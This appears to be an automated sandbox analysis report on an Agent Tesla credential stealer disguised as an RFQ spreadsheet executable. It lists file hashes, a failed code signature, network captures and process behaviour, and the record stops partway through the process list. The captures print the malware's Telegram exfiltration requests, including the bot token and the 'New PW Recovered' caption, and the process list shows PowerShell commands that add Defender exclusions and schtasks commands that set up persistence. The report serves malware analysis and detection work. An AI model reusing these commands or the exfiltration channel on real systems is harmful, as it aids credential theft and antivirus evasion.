                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.773686109262418
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                            • Win32 Executable (generic) a (10002005/4) 49.96%
                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            File size:767'496 bytes
                                            MD5:626130b6e15538c11f7c38c2fe4a6039
                                            SHA1:706ca5ac781496076d1604536b9ce10ac1f62ee1
                                            SHA256:b89d6be0bcfb915492beb7ae726f815dcf289a284e650c200bda4faf5db60fa1
                                            SHA512:2c27353ea0bc04cd0b015dccd340749ea4d91c58ab249cfa30b7bc5c546a76d85f6d096e650d64c3cd891f1d75b92fe93f67961b93ecd890a86c877032572024
                                            SSDEEP:12288:6PoO3mXWQxhFtF1aTxk/THYL9zkFSr1amot3ScRjg6GeJq5k4mvp9QtmYJn3KSrZ:6To/xhHHadkLHSaDLXGJmvpWtxJlrk0
                                            TLSH:D8F49E91A5E405CDC0F7DEBE8FC11703EFA059168C25CE8A689543CB54E6B83F925B2B
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....I.f..............0......p.......+... ...@....@.. ....................................@................................

                                            File Icon

                                            Icon Hash:8f818c848c88874f

                                            Static PE Info

                                            General

                                            Entrypoint:0x4b2b16
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x660349FD [Tue Mar 26 22:19:41 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Authenticode Signature

                                            Signature Valid:false
                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                            Signature Validation Error:The digital signature of the object did not verify
                                            Error Number:-2146869232
                                            Not Before, Not After
                                            • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                            Subject Chain
                                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                            Version:3
                                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                            Serial:7C1118CBBADC95DA3752C46E47A27438

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb2ac40x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x69ec.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xb80000x3608
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xbc0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xb0b1c0xb0c003a3e13eea5ee6f14687716fe148a0068False0.8759337429278642data7.804264542022236IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xb40000x69ec0x6c002f43d42ece5aa337a83535200c33dfb4False0.4643012152777778data6.148496436974665IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xbc0000xc0x400dfaf882d08d530afde182ed4d819e151False0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xb41d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5906 x 5906 px/m0.48404255319148937
                                            RT_ICON0xb46400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 5906 x 5906 px/m0.35737704918032787
                                            RT_ICON0xb4fc80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5906 x 5906 px/m0.30417448405253283
                                            RT_ICON0xb60700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5906 x 5906 px/m0.1849585062240664
                                            RT_ICON0xb86180x2093PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9666626693848184
                                            RT_GROUP_ICON0xba6ac0x4cdata0.75
                                            RT_GROUP_ICON0xba6f80x14data1.05
                                            RT_VERSION0xba70c0x2e0data0.44429347826086957

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            05/22/24-17:27:00.989462TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49712443192.168.2.5149.154.167.220
                                            05/22/24-17:26:58.094926TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49709443192.168.2.5149.154.167.220

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 22, 2024 17:26:57.088270903 CEST49709443192.168.2.5149.154.167.220
                                            May 22, 2024 17:26:57.088315964 CEST44349709149.154.167.220192.168.2.5
                                            May 22, 2024 17:26:57.088382959 CEST49709443192.168.2.5149.154.167.220
                                            May 22, 2024 17:26:57.110867023 CEST49709443192.168.2.5149.154.167.220
                                            May 22, 2024 17:26:57.110891104 CEST44349709149.154.167.220192.168.2.5
                                            May 22, 2024 17:26:57.761758089 CEST44349709149.154.167.220192.168.2.5
                                            May 22, 2024 17:26:57.761854887 CEST49709443192.168.2.5149.154.167.220
                                            May 22, 2024 17:26:57.768841982 CEST49709443192.168.2.5149.154.167.220
                                            May 22, 2024 17:26:57.768861055 CEST44349709149.154.167.220192.168.2.5
                                            May 22, 2024 17:26:57.769318104 CEST44349709149.154.167.220192.168.2.5
                                            May 22, 2024 17:26:57.823657036 CEST49709443192.168.2.5149.154.167.220
                                            May 22, 2024 17:26:57.851416111 CEST49709443192.168.2.5149.154.167.220
                                            May 22, 2024 17:26:57.898497105 CEST44349709149.154.167.220192.168.2.5
                                            May 22, 2024 17:26:58.094490051 CEST44349709149.154.167.220192.168.2.5
                                            May 22, 2024 17:26:58.094852924 CEST49709443192.168.2.5149.154.167.220
                                            May 22, 2024 17:26:58.094878912 CEST44349709149.154.167.220192.168.2.5
                                            May 22, 2024 17:26:58.941207886 CEST44349709149.154.167.220192.168.2.5
                                            May 22, 2024 17:26:58.941984892 CEST44349709149.154.167.220192.168.2.5
                                            May 22, 2024 17:26:58.942074060 CEST49709443192.168.2.5149.154.167.220
                                            May 22, 2024 17:26:58.944734097 CEST49709443192.168.2.5149.154.167.220
                                            May 22, 2024 17:27:00.029994011 CEST49712443192.168.2.5149.154.167.220
                                            May 22, 2024 17:27:00.030030966 CEST44349712149.154.167.220192.168.2.5
                                            May 22, 2024 17:27:00.030148983 CEST49712443192.168.2.5149.154.167.220
                                            May 22, 2024 17:27:00.033742905 CEST49712443192.168.2.5149.154.167.220
                                            May 22, 2024 17:27:00.033770084 CEST44349712149.154.167.220192.168.2.5
                                            May 22, 2024 17:27:00.673270941 CEST44349712149.154.167.220192.168.2.5
                                            May 22, 2024 17:27:00.673458099 CEST49712443192.168.2.5149.154.167.220
                                            May 22, 2024 17:27:00.675250053 CEST49712443192.168.2.5149.154.167.220
                                            May 22, 2024 17:27:00.675278902 CEST44349712149.154.167.220192.168.2.5
                                            May 22, 2024 17:27:00.675523996 CEST44349712149.154.167.220192.168.2.5
                                            May 22, 2024 17:27:00.725646019 CEST49712443192.168.2.5149.154.167.220
                                            May 22, 2024 17:27:00.770490885 CEST44349712149.154.167.220192.168.2.5
                                            May 22, 2024 17:27:00.988750935 CEST44349712149.154.167.220192.168.2.5
                                            May 22, 2024 17:27:00.989404917 CEST49712443192.168.2.5149.154.167.220
                                            May 22, 2024 17:27:00.989413977 CEST44349712149.154.167.220192.168.2.5
                                            May 22, 2024 17:27:01.719639063 CEST44349712149.154.167.220192.168.2.5
                                            May 22, 2024 17:27:01.719718933 CEST44349712149.154.167.220192.168.2.5
                                            May 22, 2024 17:27:01.719851017 CEST49712443192.168.2.5149.154.167.220
                                            May 22, 2024 17:27:01.720688105 CEST49712443192.168.2.5149.154.167.220

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 22, 2024 17:26:57.064552069 CEST5808153192.168.2.51.1.1.1
                                            May 22, 2024 17:26:57.076679945 CEST53580811.1.1.1192.168.2.5

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            May 22, 2024 17:26:57.064552069 CEST192.168.2.51.1.1.10x3962Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            May 22, 2024 17:26:57.076679945 CEST1.1.1.1192.168.2.50x3962No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • api.telegram.org

                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549709149.154.167.2204436224C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            TimestampBytes transferredDirectionData
                                            2024-05-22 15:26:57 UTC260OUTPOST /bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=---------------------------8dc7a52168f7017
                                            Host: api.telegram.org
                                            Content-Length: 918
                                            Expect: 100-continue
                                            Connection: Keep-Alive
                                            2024-05-22 15:26:58 UTC25INHTTP/1.1 100 Continue
                                            2024-05-22 15:26:58 UTC918OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 61 35 32 31 36 38 66 37 30 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 30 36 32 30 37 35 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 61 35 32 31 36 38 66 37 30 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 32 2f 32 30 32 34 20 31 31 3a 32 36 3a 35 36 0a 55 73 65 72
                                            Data Ascii: -----------------------------8dc7a52168f7017Content-Disposition: form-data; name="chat_id"7062075018-----------------------------8dc7a52168f7017Content-Disposition: form-data; name="caption"New PW Recovered!Time: 05/22/2024 11:26:56User
                                            2024-05-22 15:26:58 UTC1007INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Wed, 22 May 2024 15:26:58 GMT
                                            Content-Type: application/json
                                            Content-Length: 619
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            {"ok":true,"result":{"message_id":281,"from":{"id":7156462915,"is_bot":true,"first_name":"$dollars","username":"LobgddhysBot"},"chat":{"id":7062075018,"first_name":"ISIKA","type":"private"},"date":1716391618,"document":{"file_name":"user-302494 2024-05-22 11-26-56.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAIBGWZODsI59_fJJBVLMdnMz-HAjcJhAAJ9BAAC0g9wRphLhTPK4IGENQQ","file_unique_id":"AgADfQQAAtIPcEY","file_size":320},"caption":"New PW Recovered!\n\nTime: 05/22/2024 11:26:56\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.549712149.154.167.2204437448C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            TimestampBytes transferredDirectionData
                                            2024-05-22 15:27:00 UTC260OUTPOST /bot7156462915:AAE3EIUy20eRSFdNZcqhQa0y1tAvt8IT_oY/sendDocument HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=---------------------------8dc7a521867a3ca
                                            Host: api.telegram.org
                                            Content-Length: 918
                                            Expect: 100-continue
                                            Connection: Keep-Alive
                                            2024-05-22 15:27:00 UTC25INHTTP/1.1 100 Continue
                                            2024-05-22 15:27:00 UTC918OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 61 35 32 31 38 36 37 61 33 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 30 36 32 30 37 35 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 61 35 32 31 38 36 37 61 33 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 32 2f 32 30 32 34 20 31 31 3a 32 36 3a 35 39 0a 55 73 65 72
                                            Data Ascii: -----------------------------8dc7a521867a3caContent-Disposition: form-data; name="chat_id"7062075018-----------------------------8dc7a521867a3caContent-Disposition: form-data; name="caption"New PW Recovered!Time: 05/22/2024 11:26:59User
                                            2024-05-22 15:27:01 UTC1007INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Wed, 22 May 2024 15:27:01 GMT
                                            Content-Type: application/json
                                            Content-Length: 619
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            {"ok":true,"result":{"message_id":282,"from":{"id":7156462915,"is_bot":true,"first_name":"$dollars","username":"LobgddhysBot"},"chat":{"id":7062075018,"first_name":"ISIKA","type":"private"},"date":1716391621,"document":{"file_name":"user-302494 2024-05-22 11-26-59.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAIBGmZODsUfN098HnzqovpPuiNFoxQhAAJ-BAAC0g9wRpS5in9_t5MmNQQ","file_unique_id":"AgADfgQAAtIPcEY","file_size":320},"caption":"New PW Recovered!\n\nTime: 05/22/2024 11:26:59\nUser Name: user/302494\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:11:26:51
                                            Start date:22/05/2024
                                            Path:C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
                                            Imagebase:0x4a0000
                                            File size:767'496 bytes
                                            MD5 hash:626130B6E15538C11F7C38C2FE4A6039
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2064422472.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:11:26:53
                                            Start date:22/05/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
                                            Imagebase:0x510000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:11:26:53
                                            Start date:22/05/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:11:26:53
                                            Start date:22/05/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
                                            Imagebase:0x510000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:11:26:54
                                            Start date:22/05/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:11:26:54
                                            Start date:22/05/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp"
                                            Imagebase:0xe80000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:11:26:54
                                            Start date:22/05/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:11:26:54
                                            Start date:22/05/2024
                                            Path:C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
                                            Imagebase:0xdf0000
                                            File size:767'496 bytes
                                            MD5 hash:626130B6E15538C11F7C38C2FE4A6039
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3268439480.0000000003262000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3268439480.000000000327D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.3268439480.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:10
                                            Start time:11:26:55
                                            Start date:22/05/2024
                                            Path:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\ywKDUBCUA.exe
                                            Imagebase:0xd00000
                                            File size:767'496 bytes
                                            MD5 hash:626130B6E15538C11F7C38C2FE4A6039
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.2104193964.00000000043B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 83%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:11:26:56
                                            Start date:22/05/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff6ef0c0000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:11:26:58
                                            Start date:22/05/2024
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp"
                                            Imagebase:0xe80000
                                            File size:187'904 bytes
                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:11:26:58
                                            Start date:22/05/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
